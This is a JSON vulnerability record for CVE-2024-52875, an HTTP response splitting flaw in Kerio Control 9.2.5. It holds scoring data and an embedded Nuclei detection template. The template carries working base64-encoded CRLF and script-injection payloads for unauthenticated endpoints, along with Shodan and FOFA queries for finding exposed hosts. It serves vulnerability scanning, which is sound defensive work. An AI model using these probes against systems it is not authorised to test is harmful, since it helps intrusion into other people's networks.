{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-52875/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-52875/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-52875/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-52875/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-52875/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-52875"},"sightings":{"href":"/api/v1/sightings/cve-2024-52875"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.29558,"kev":false,"percentile":0.98107},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-52875.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-52875\n\ninfo:\n  name: Kerio Control v9.2.5 - CRLF Injection\n  author: ritikchaddha,iamnoooob,rootxharsh,pdresearch\n  severity: high\n  description: |\n    Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5\n  impact: |\n    Attackers can perform HTTP response splitting attacks to inject arbitrary HTTP headers and content, potentially leading to XSS, cache poisoning, or session hijacking.\n  remediation: |\n    Update Kerio Control to a version later than 9.2.5 that addresses the CRLF injection vulnerability.\n  reference:\n    - https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-52875\n  classification:\n    cve-id: CVE-2024-52875\n    cwe-id: CWE-74\n    epss-score: 0.29558\n    epss-percentile: 0.98107\n  metadata:\n    verified: true\n    max-request: 4\n    shodan-query: \"Kerio Control\"\n    fofa-query: \"Kerio Control\"\n  tags: cve,cve2024,kerio,crlf,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d\"\n      - \"{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d\"\n      - \"{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d\"\n      - \"{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d\"\n\n    stop-at-first-match: true\n    matchers-condition: or\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?m)^Crlf:\\s*$'\n\n      - type: dsl\n        dsl:\n          - \"contains(body,'<script>alert(document.domain)</script>')\"\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(location, \"\")'\n          - 'status_code == 302'\n        condition: and\n# digest: 490a0046304402202d3bf589563f436fe34bd7bbf7b24753592421916acb309646b2f4a1d2f70f5b022004cf27e485ca02d260cd6c2db269d3508b2e453b8eb10947885608c76dcbfff5:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-52875"}